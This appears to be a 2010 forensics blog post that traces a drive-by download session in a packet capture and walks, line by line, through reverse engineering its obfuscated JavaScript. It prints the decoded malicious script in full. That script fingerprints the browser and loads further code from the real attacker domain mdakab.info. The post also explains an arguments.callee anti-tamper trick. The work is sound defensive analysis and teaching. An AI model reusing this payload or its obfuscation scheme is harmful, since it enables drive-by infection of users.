Introduction
In our first post in the forensics and reversing series, we examined why HTTP gzip content encoding is a larger and more serious problem than most people realize. We’ll use the end of the first post as a starting point for analysis in this post. It also serves as an example of something far more important. That is, the very heart of forensics – and something I’d propose is the very definition of forensics. I teach a network forensics and reversing class together with Mike Sconzo about once a month. This is a point I raise at least a dozen times a day in class. That is:
World class forensics engineers are the ones who quickly and intelligently reduce millions of sessions to about a dozen worthy of deeper analysis.
What constitutes quickly? I suppose it depends on the tool being used to perform the analysis, but I’d generalize by saying no more than a couple minutes and/or the same number of clicks. We’ll see this in a moment.
What constitutes intelligently? We can answer this question by looking at a host-based forensics analogy. Suppose you were given a hard disk of a compromised machine and you needed to find the malware. There could be millions of files on the computer, so where do you start? Most of the time, especially for most standard compromises, the following steps will work (this is an over-generalization, but one that works nonetheless):
- Show only PE files (exe, dll, etc..). At this point you’ve probably gone from nearly a million to about 100,000.
- Show only PE files outside the Program Files directory. Here you may go from about a hundred thousand files to tens of thousands.
- Depending on the assumed time of compromise, show only those PE files modified or created in a specific range of days. At this point you should go from tens of thousands to less than 100.
- Since malware tends to be smaller in size, show only those PE files less than 500k. At this point you should be looking at only a handful of files, and most of the time, the malware you’re looking for will be one of them.
As you’ll see next, the same applies to network traffic. We can intelligently go from millions of sessions to only a few by wisely layering traits of network sessions with little attention paid to what is inside those sessions.
Intelligent Network Forensics
Extending the discussion in the previous section (and the previous post in this series), we’ll start with examining a pcap containing about 50,000 sessions (over a gig of traffic) in NetWitness Investigator.Our fist pivot is sessions containing nginx webservers. This brings us from 50,000 sessions down to about 300:
Next, we’ll pivot on gzip so we’re only looking at gzip’ed content from nginx servers:
Now we’re down to 33 sessions, but that’s still not good enough. If you figure an average 60 seconds of analysis time per session, that’s still a half hour of analysis just checking to see if there’s something interesting in those sessions. That is a huge waste of time and not intelligent forensics.
In the last post in this series, we combined the above with an examination of traffic from “other” countries. This time we won’t be geopolitically prejudiced. Instead, we’ll pick on top level domains.
Many reports from AV companies show most malware comes from the .com TLD. I think that metric is stupid. (Sorry.) Let’s put aside for a minute the obviously glaring problem with how they define malicious content in the first place. (Or maybe save that discussion for a rant in a separate post.) Most reports showing such metrics never show the total amount of traffic sampled from each domain. I’m certain .com is the vast majority of that traffic, and from a percentage perspective, malicious content is a small percentage of total traffic sourced from .com domains. Especially compared to other domains like .info and .cc. (In other words, I’d venture that the ratio of legitimate to malicious traffic from .info and .cc domains is a drastically different from the ratio of the same from .com.) Many sponsors charge 99 cents or less per .info or .cc domain registered, making it easy for hackers to register 100’s of throw-away domains en masse which is why we see such a high percentage of malware coming from those TLDs.
What happens when we add an .info filter to our above pivots? We go from 50,000 sessions down to one.
(Hey Latvia, remember how I said we’d pick on our own country in part 2 of this series?!)
At this point, looking at this single session is an intelligent use of time.
Here’s what we see in this session:
GET /cgi-bin/guest HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.elitefitness.com/forum/weight-training-weight-lifting/gym-mirrors-where-do-you-get-them-289864.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Connection: Keep-Alive
Host: mdakab.info
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Feb 2010 10:20:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Pragma: no-cache
Content-Encoding: gzip
4EA
……….}Xko….^ ….D.eyg….V..v
..]7h. P.!.$..{m……..Z.ue’6 .1.;3……..~;O_…I…E}._mq.^..m……..)…>/……….b…~4..Z.(….~{#..9.|.~2.)N……..|….*[<[.......=$E.Dt.........z..b.vUV./......|.|..:[}..s>....]t….X.q..6..rN..I..O..\…..p…gV…..L.i.n….u.BW………?..wu..3.Y!…..S:+….}&..pT.V,.=w.
As expected, it’s gzip compressed, although looking at the session in NetWitness Investigator hides that fact by automatically deflating the contents for us. Also notice the Referrer: tag in the client’s HTTP request. As the client was redirected from a forum, it’s likely that forum is serving advertising containing drive-by attacks, or a link in the forum is tricking people into clicking.
If we take the contents of the session Investigator automatically deflated we see the following (with some formatting added here):
Reverse Engineering the Javascript
Important notes:1 – Of course, the following steps should NOT be performed on a production system! Furthermore, the system you run these steps on should be fully patched!! Using Visual Studio means the IE scripting engine is used in the debugging process, which could present issues if you’re not careful. I do work like this on a fully patched x64 Windows 2008 system.
2 – The remainder of the post dives into code analysis and using Visual Studio for debugging. If there are basic concepts I failed to cover effectively to make this process easily repeatable for you, please send me an email at gary.golomb to netwitness.com and I will ensure to cover that information in a separate post or video. (In rereading this post, I see some potential gaps. :-/)
This exercise will use two different tools. The first is Visual Studio. If you do not have it already, you can download it free at http://www.microsoft.com/express/Downloads/#2010-Visual-Web-Developer. You will need Visual Web Developer for this exercise, or the all-in-one iso. The second tool is PDFStreamDumper available from: http://sandsprite.com/blogs/index.php?uid=7&pid=57. While other tools could be used for the same tasks we’ll use PDFStreamDumper for, part 3 of this series will focus on PDF reverse engineering and we’ll be using that tool heavily. Might as well get your feet wet with it now!
To fully dissect the javascript sent to the client, we need to debug it step-by-step. To do so, we’ll first create an ASP project in Visual Studio (since that give us the debug functionality needed to make this much easier). In that project, we’ll remove all the default content created in the page for us by VS, except the first line, and append the content returned by the webserver. Doing so gives us something like the following:
Of course, we can be sure the logic we care about is the javascript, but that is still highly unreadable in one giant line and not in a format that allows for easy debugging. Because of that, we’ll use PDFStreamDumper to help clean it up. First, we open the application, then go into the javascript UI:
Next, we paste the unformatted javascript into the top script pane:
Next, select the Format Javascript selection to make it easier to read:
Although, it’s really not very easy to read yet since the variable names have confusing names like “b_b_x_O3XJ4_qN” and “x__IK_7p_f” that will make it hard to follow references to them as we walk through the code in a moment. Because of this, we’ll also apply the Basic Refactor functionality of PDFStreamDumper to clean up the code a little more:
And the code we want now is in the right-side pane:
We can take the code in the right-side pane and now paste it back into our Visual Studio project from before and it’ll now look something like the following:
Before moving on, let’s examine the HTML in the page to determine how the javascript is used on the client:
On line #1 we see the javascript function is called the moment the page is loaded on the client side without any user interaction. The only value passed to the function is the number 0.
On line #3 and #4 we see two hidden values we can assume are leveraged within the javascript somehow, yet we still need to determine how/why. (I removed the large value from #3 just for the sake of this short examination. It is viewable in the previous display of the code and will be examined again shortly.)
At this point we can set a debug point at the start of the javascript function by clicking in the far-left margin next to the line we want to set the breakpoint:
Then we can start the debugger:
One thing you’ll notice is that Internet Explorer pops up in the background. This is important because it means the javascript you debug using the technique I’m showing here will show you how IE interprets the javascript, not how Firefox, Opera, Safari, etc interprets it. Interestingly, they all have subtle difference from each other in that regard. As most malicious javascript targets Windows users running IE, this is a safe method to start with, however the analysis will be incorrect if the JS is targeting a different browser, operating system, or javascript engine (we’ll see this in later posts).
The yellow line shows the line the debugger will execute next if you hit “step into.” The red box shows the “step into” button:
As you step line-by-line, you can mouse-over a variable to see what it contains before and after you step into it, as the following two examples show:
In the last example, we see gvar_2 was just assigned the value “z.” This should immediately catch your eye as interesting because of line #4 for the HTML code we examined just a minute ago. Gvar_2 got the value “z” through the following steps:
- Gvar_1 was built as an integer array with the values:
- 101
- 111
- 256
- -1
- 120
- 23
- The value at offset 4 in gvar_1 (value = 120, because the array uses zero-based indexing) was incremented by the number two to give the value 122.
- The value 122 was treated as a decimal representation of a letter and fromCharCode() was used to convert it to its corresponding letter. As you can see in the ascii table shown here (http://www.asciitable.com/), 122 is the decimal equivalent of the letter z.
Continuing to the next few lines, we see the following:
In the above, we see:
- thM0X3_Ac0O__Vw is tested to see if it is null, which it is.
- Gvar_3 is assigned the first value in the array gvar_1, which is 101.
- Gvar_3 is reassigned the letter representation of that number using fromCharCode, which is “e”
- Gvar_3 is then added to itself and becomes “ee”
- thM0X3_Ac0O__Vw is then assigned the value of the object in the HTML with the ID “ee,” also shown below:
So far, so good, right? As you can see, reverse engineering javascript and what it’s doing isn’t too hard. I’ve even been keeping this lower-level than I need too since we can just summarize everything we’ve seen so far by just making the point given in #5 above.
Well, reverse engineering javascript can be this easy, most of the time. Unfortunately, in this case it’s not going to be that easy. A few lines after the above logic, we hit the following. The break point was set at the start of the while loop so you can see the values of each variable as we enter it:
Gvar_5, 6, 7, and 9 are number values. Gvar_8 is an object that is converted to a string and held in gvar_10. You can see the start of the string held in gvar_10 in the locals table at the bottom of the screenshot, but let me include a little more here:
function wg7_I6d_3kg(N__egeg_iCt_C, thM0X3_Ac0O__Vw) {
var gvar_0 = “”;
var gvar_1 = new Array(101, 111, 256, -1, 120, 23);
var gvar_2 = String.fromCharCode(gvar_1[4] + 2);
gvar_1[3] = gvar_1[2] * 2;
As you see, gvar_10 is the entire text of the function itself. WHAT?!
This trick has been used in malicious javascript for several years now, but is finally making its way into more mainstream malware (aka: become more common). Although the functionality presented by arguments.callee seems totally pointless, it’s actually used in anonymous recursive functions as well as in debug code, as the following example shows:
function testCallee()
{
return arguments.callee;
}
document.write(testCallee());
In the above simple example, the programmer is using arguments.callee to write the function itself to the page displayed, a common test in the process of developing certain types of client-side apps.
However, when used in malicious javascript (as we’re examining), the use of arguments.callee can make the job of reverse engineering JS more difficult. Let’s take a detailed walk through that while loop line-by-line and discuss:
In the first line inside the while loop (red box), gvar_9 has the value zero. Gvar_10 is the entire string of the function itself (also shown in the locals box) as obtained by using arguments.callee, so the letter at index zero in that string is the “f” in the word “function.” charCodeAt() is used to return the number representing that letter, which you can see at http://www.asciitable.com/ and in the locals box is the decimal number 102.
In the next line (shown above), that value is tested to see if it is greater than the value in gvar_6 (which is 47), or less than the value in gvar_7 (which is 58). If you refer back to http://www.asciitable.com/, you’ll see the test is looking only for the ascii numbers zero through nine.
If the value is not an ascii character for a number zero through nine, then gvar_9 is incremented and the while loop continues, as shown:
Let’s examine what happens inside the if statement when an ascii number is encountered:
At line #6 gvar_5 is tested to see if it equals the number four. If so, it is reset to be zero. In this case, this is the first time we have entered the if statement while debugging this code and gvar_5 is still equal the number zero from its initial assignment earlier in the code.
Skipping over the if statement, we hit line #10 where we see manipulation of gvar_4. I did not address gvar_4 earlier, but here is the code that setup gvar_4 just before the setup of this while loop:
var gvar_4 = new Array(-2, 7, 0, 0);
gvar_4[0] += 2;
gvar_4[1] -= 7;
The array is built with four numbers in it. Gvar_4[0] is equal to -2, but subsequently has +2 added to it. Gvar_4[1] is equal to 7, but subsequently has 7 subtracted from it. As we see, this is just a confusing way of setting up an array with four numbers all equal to zero.
Back to line #10, the first number we hit is the number 7 in this string: “function wg7_I6d_3kg.” The decimal byte value for 7 is 55, so at line #10 the number in index zero (because gvar_5 equals zero at this point) in the array gvar_4 is incremented by the number 55. In this case it is 0 + 55 = 55, but you can see how this number will grow for every number encountered as we walk through the text of the function itself.
Line #11 creates gvar_12 and line #15 resets it, making it a dummy value only inserted for the purpose of confusing us. (Or is it?! You’ll have to answer this again after we see how arguments.callee is being used here.)
Line #12 tests the value we just wrote into the array gvar_4 to see if it’s greater than 512. Because the decimal values for the number zero through nine are 48-57, that test will always evaluate false and will never be entered.
Line #17 increments the counter used as an index pointer for gvar_4 and the loop continues. After the while loop has completed, we hit a for loop that basically just decrements each number in gvar_4 by 256 (given by the number at index 2 inside gvar_1):
So why is arguments.callee such a problem?
Because we changed the contents of this function to make it easier to read, understand, and work with! We took all the following:
var aA_nii_C6
var b_b_x_O3XJ4_qN
var e22y8QdoQv_Dta
var f1Gc7_7pPVm_vg
var Ffyncmd8Y
var g2N2c58g_cFcf
var IQ__s_0qI_w_Em5
var jtJuIuDEg
var lEu5nv0
var Lqhs6q0
var N50_648D7_t_k
var Op18mkb
var q0703A5
var Qm_Y__X
var r1Qq5Y3R
var sFFiD1J
var SV5SwoJfj_O
var U__i5_j48r
var x__IK_7p_f
var xyz
And renamed them gvar_1, gvar_2, gvar_3 and so on… That means we removed numbers from the names of variables the decoding algorithm needs to function properly. In other words, in this case, the decoding algorithm is able to determine if the javascript has been tampered with, and if so, it fails to decode properly!
So the next question is: will the decoding algorithm work if we reformat the javascript to make it easier to follow, without renaming anything (eg: inserting new lines, spaces, tabs, and whitespace to make it easier to read)? So far we have not encountered anything to indicate reformatting the javascript will break decoding. Because of that, I’ll go back to the old naming conventions and just continue the debugging from where we left off. Rerunning everything with the original variable names gets us through the for loop with the following values in the array we previously referred to as gvar_4:
Now things start to get a little more interesting. We hit a while loop that appears to start working on the very long encoded string contained in the hidden HTML object.
Qm_Y__X initially has the value zero and in each pass through the loop is tested to see if its value is less than the number representing the length of the encoded string, presumably making it an index into the string as the decode logic works through decoding the string. The first line inside the while loops takes the next two characters from the index position (currently index zero, making the substring “4g”) and assigns them to o_40M7__5On, while also appending a “^” character.
To understand the next line, we first need to talk about how the parseInt() function works in javascript. It has the following format:
parseInt(string, radix)
The parseInt() function parses a string and returns an integer. The radix parameter is used to specify which numeral system to use. For example, a radix of 16 (hexadecimal) indicates that the number in the string should be parsed from a hexadecimal number to a decimal number.
Also from http://www.w3schools.com/jsref/jsref_parseint.asp:
Tips and Notes
Only the first number in the string is returned!
Leading and trailing spaces are allowed.
If the first character cannot be converted to a number, parseInt() returns NaN.
Now consider the next line:
The string passed to parseInt() is “4g^” meaning the only number parsed is the number 4. However, the radix used for every number parsed inside this while loop is 23. The next few lines get considerably more complex and make up the heart of this impressive encoding/decoding scheme. We’ll examine them line-by-line as we take a single detailed pass through this while loop.
We pick up at line #5, where a counter is reset every time it’s equal to the number four. As this is our first time inside the loop, it’s currently has the value zero.
Jumping over that if statement to line #9, we see the number variable just assigned a value in the previous section where we discussed parseInt(). That number is being decremented by ValueA multiplied by ValueB where:
ValueA is (f1Gc7_7pPVm_vg + 2). The variable f1Gc7_7pPVm_vg starts at the number zero when we first enter this loop, but is incremented with every pass through the loop at line #18, making this variable change for every charter evaluated.
ValueB is (g2N2c58g_cFcf[IQ__s_0qI_w_Em5]), where g2N2c58g_cFcf is a number array containing the following values:
It’s important to stop here and draw your attention to the fact that the values inside g2N2c58g_cFcf (the array pictured above) were generated by parsing the text resulting from arguments.callee and applying the math examined when we looked at that first while loop. By trying to change the variable names the way we did to make things easier to reverse, the resulting numbers placed inside the array above would have been totally different, meaning the next few steps would produce completely incorrect results!
In our first step into the loop, IQ__s_0qI_w_Em5 is equal to the number zero, so the value used from the array for this first pass is 251. At line #17, IQ__s_0qI_w_Em5 is incremented with each pass, but line #5 resets it to zero every time it reaches the value four, ensuring the array g2N2c58g_cFcf is cycled through correctly. So in this case, ValueA = 2 and ValueB = 251, and 2 * 251 = 502, which is subtracted from 108 to give the value negative 394. However, line #10 tests to see if the value just computed is less than 0, which of course it always will be!
Line #12 just assigns the value 256 to the variable xyz.
Line #13 give us the final decode for the value needed by the remainder of the code by taking the value in sFFiD1J (currently -394), which in this case becomes +118 after the execution of that line.
Line #15 gradually builds a string by appending each newly decoded value to it and lines #16-18 are just pointer updating as discussed already. If we remove our breakpoint in the loop and let it complete (but add a new breakpoint after the loop so we can examine variables when it’s complete), here is the final value of the string containing the fully decoded contents of the encoded HTML object:
var ght0jcY_f1c = -1;var DMv_m70U81LIb = “01″;var tI__JGR85k__254 = navigator.appMinorVersion;while((ght0jcY_f1c = tI__JGR85k__254.indexOf(“;SP”, ght0jcY_f1c + 1)) != -1) {var RC_Vt__07 = tI__JGR85k__254.charAt(ght0jcY_f1c + 3);if (RC_Vt__07 == “1″)DMv_m70U81LIb = “02″;else if (RC_Vt__07 == “2″)DMv_m70U81LIb = “03″;else if (RC_Vt__07 == “3″)DMv_m70U81LIb = “04″;else if (RC_Vt__07 == “4″)DMv_m70U81LIb = “05″;else if (RC_Vt__07 == “5″)DMv_m70U81LIb = “06″;else if (RC_Vt__07 == “6″)DMv_m70U81LIb = “07″;if (DMv_m70U81LIb != “01″)break;}if (DMv_m70U81LIb == “01″ && tI__JGR85k__254.indexOf(“Release Candidate”, 0) != -1)DMv_m70U81LIb = “08″;var RihOuI_7K = “2″ + DMv_m70U81LIb;var W118_aA4eh4O;if (!(W118_aA4eh4O = navigator.systemLanguage)) {if (!(W118_aA4eh4O = navigator.userLanguage)) {if (!(W118_aA4eh4O = navigator.browserLanguage)) {W118_aA4eh4O = navigator.language;}}}if (W118_aA4eh4O) {W118_aA4eh4O = W118_aA4eh4O.substr(0, 10);var QS743__js_4 = “”;for(var H4_p__kQ4 = 0; H4_p__kQ4 < W118_aA4eh4O.length; H4_p__kQ4++) {var DL___q0_RU54_T = W118_aA4eh4O.charCodeAt(H4_p__kQ4).toString(16);if (DL___q0_RU54_T < 2)QS743__js_4 += “0″;QS743__js_4 += DL___q0_RU54_T;}while(QS743__js_4.length < 20) {QS743__js_4 += “00″;}RihOuI_7K += “L” + QS743__js_4;}var f_Ha0lc_a_1_P = document.createElement(“script”);f_Ha0lc_a_1_P.setAttribute(“type”, “text/javascript”);f_Ha0lc_a_1_P.setAttribute(“src”, “http://mdakab.info/cgi-bin/guest/y002106R09007318X86487362Ycd32e585Z0100f060″ + RihOuI_7K);document.body.appendChild(f_Ha0lc_a_1_P);
As you see, it decodes into more new javascript. But, we still need to see how it’s leveraged, which the last few lines of the code we’re currently debugging will show us:
First, the red box shows the variable b_b_x_O3XJ4_qN being assigned the value “e.”
The next line appends the string “value” to it, making the new contents of b_b_x_O3XJ4_qN “evalue.”
The following line reassigns it as a substring of the original value, in this case the first four letters of “evalue,” or “eval.”
The final line is the equivalent of this.window[eval](string), but the string is the newly decoded javascript, so this javascript is turning around and executing the newly decoded script.
Rather than take a detailed walk through the analysis of the newly decoded javascript, I’ll leave it as an exercise for you. Don’t worry – there’s no use of arguments.callee, so it’s much easy to work with!! Feel free to reformat it and rename variables to make it easier to read. You can create a new website in Visual Studio and debug it the same way. This time we only have the javascript here, so you’ll need to manually add the HTML needed to get it to execute, as you can see in the following example. Notice I used the same technique they did to get the javascript to execute as soon as the page is loaded (meaning you can just add a breakpoint to the top line of the javascript).
Here is the new javascript with formatting:
And here is the raw text of the javascript if you would like to download it and analyze it using the same techniques): http://pastebin.com/raw.php?i=vPeBF37r
Important note!!
Although the URL in line #39 is displayed in-tact above, when debugging please remove the string “mdakab.info” to prevent the network activity from taking place accidently (and executing logic you can’t yet debug easily).
Back to the network activity
So we just took a VERY deep dive into javascript reverse engineering. If you look at the follow-on data in this session, we could explain why it happened based on what we just did.
But... Did the work we just do seem like a waste of time? I mean, the activity is in the network traffic, so we can just examine the behavior of the javascript based on what happened after the client got it.
That’s entirely true! If you reverse JS like this every time you see it, that is an enormous waste of time. However, the next post in this series will focus on the PDF file the javascript in this session eventually grabs and executes. There will be JS inside of there and we’ll need to know how to reverse it, so this post is really just the basis for the next in this series.
At this point we also have a domain name from the embedded JS we can use to do the type of internet research shown at the bottom of the first post in this series. We’ll expand that line of analysis in further posts in this series also…
Gary Golomb
No comments:
Post a Comment